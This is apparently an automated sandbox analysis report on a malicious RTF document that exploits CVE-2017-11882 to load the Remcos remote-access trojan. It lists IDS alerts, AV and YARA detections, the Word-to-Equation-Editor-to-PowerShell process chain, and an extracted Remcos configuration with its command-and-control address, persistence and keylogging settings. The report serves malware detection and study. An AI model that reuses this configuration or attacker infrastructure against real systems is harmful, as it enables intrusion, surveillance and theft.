                Source: Registry Key set, Author: Joe Security: Data: Details: B4 3D DD D1 91 B0 DF CC FB 95 F6 2E 53 37 48 40 98 D2 05 4C 75 58 AB 79 F1 76 B7 EE DC 24 90 16 0A D8 D8 04 61 CC 41 2E AB 49 20 6E A3 7F 5E D8 D7 08 E5 34 45 93 AC E7 03 C0 1F EF 25 8A 6D B3 4E 09 88 35 56 DA 3E BA 49 A0 77 E9 E2 4C 1F C3 B6 5A 68 F4 78 72 B9 A7 2B 6B 60 17 2C D7 B9 45 01 31 01 95 E2 79 03 38 AB FD 5A 91 10 74 24 2B 4F 86 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3752, TargetObject: HKEY_CURRENT_USER\Software\Rmc-O0U3JA\exepath

                Timestamp                        SID      Severity  Classtype                                      Source IP       Source Port  Destination IP  Destination Port  Protocol
                2024-09-11T20:22:24.732832+0200  2020423  1         Exploit Kit Activity Detected                  45.90.89.123    80           192.168.2.22    49163             TCP
                2024-09-11T20:22:24.732832+0200  2020425  1         Exploit Kit Activity Detected                  45.90.89.123    80           192.168.2.22    49163             TCP
                2024-09-11T20:22:29.656144+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.22    49164        45.90.89.98     8243              TCP
                2024-09-11T20:22:23.606116+0200  2049038  1         A Network Trojan was detected                  207.241.227.96  443          192.168.2.22    49162             TCP
                2024-09-11T20:22:31.383018+0200  2803304  3         Unknown Traffic                                192.168.2.22    49165        178.237.33.50   80                TCP

                AV Detection

                Source: xnHel.rtf, Avira: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\Desktop\~WRD0000.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: 9.2.RegAsm.exe.400000.0.unpack, Malware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "45.90.89.98:8243", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: xnHel.rtf, ReversingLabs: Detection: 47%
                Source: Yara match, File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 9_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004338C8
                Source: powershell.exe, 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_11993e3b-7

                Exploits

                Source: Yara match, File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR
                Source: Static RTF information: Object: 0 Offset: 00006C87h
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 45.90.89.123 Port: 80
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe
                Source: ~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp.0.drStream path '_1787569685/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp.0.drStream path '_1787569720/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 9_2_00407538 _wcslen,CoGetObject,9_2_00407538
                Source: unknown, HTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
